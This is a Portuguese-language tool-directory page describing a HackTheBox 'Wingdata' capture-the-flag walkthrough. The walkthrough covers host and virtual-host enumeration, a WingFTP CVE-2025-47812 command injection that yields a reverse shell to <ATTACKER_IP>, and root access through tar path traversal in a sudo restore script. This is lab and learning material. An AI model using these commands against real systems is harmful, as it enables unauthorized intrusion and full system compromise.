Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
wingdata — HackTheBox Wingdata walkthrough cobrindo a injeção de comandos WingFTP CVE-2025-47812 para acesso inicial e escalonamento de privilégios sudo por path traversal no tar até root. | Kitploit
Ferramentas/GitHubGitHub/ledksv/wingdata
Escalada de PrivilégiosReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoCTFTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubledksv/wingdata

wingdata

há 10h 51mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

HackTheBox Wingdata walkthrough cobrindo a injeção de comandos WingFTP CVE-2025-47812 para acesso inicial e escalonamento de privilégios sudo por path traversal no tar até root.

Ver Repositório

Wingdata — HackTheBox Walkthrough

Plataforma: HackTheBox | SO: Linux

Cadeia de Ataque

A enumeração de VHost encontra um servidor WingFTP. A injeção de comando CVE-2025-47812 concede acesso inicial. Root através de um script Python de restauração com sudo que extrai um arquivo tar manipulado — o path traversal do tar escreve um arquivo arbitrário como root.

Enumeração

root@kitploit:~
nmap -sC -sV wingdata.htb -Pn

22/tcp open  ssh   OpenSSH
80/tcp open  http  wingdata.htb main site

Adicionado wingdata.htb a /etc/hosts. A porta 80 referenciava um domínio indicando virtual hosting.

Descoberta de VHost

root@kitploit:~
ffuf -u http://wingdata.htb -H 'Host: FUZZ.wingdata.htb' \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -ac

Encontrado: ftp.wingdata.htb — interface web do WingFTP Server.

CVE-2025-47812 — Injeção de Comando no WingFTP

CVE-2025-47812 é uma vulnerabilidade de injeção de comando na interface web do WingFTP Server. Um parâmetro não sanitizado entrega uma reverse shell.

root@kitploit:~
nc -lvnp 4444
python3 exploit_CVE-2025-47812.py --target http://ftp.wingdata.htb --lhost <ATTACKER_IP> --lport 4444

Shell obtida. Flag de usuário recuperada.

PrivEsc — Path Traversal no Tar

root@kitploit:~
sudo -l
# (root) NOPASSWD: /usr/bin/python3 /opt/restore.py

/opt/restore.py aceita um arquivo tar e o extrai como root. O tar não sanitiza caminhos — um arquivo manipulado com ../ no nome do arquivo escreve arquivos fora do diretório de extração.

root@kitploit:~
python3 craft_tar.py
sudo /usr/bin/python3 /opt/restore.py -b backup_888.tar

Shell root obtida. Flag de root em /root/root.txt.


Apenas para fins educacionais. Teste apenas sistemas que você possui ou tem permissão explícita para testar.

Baixar ferramenta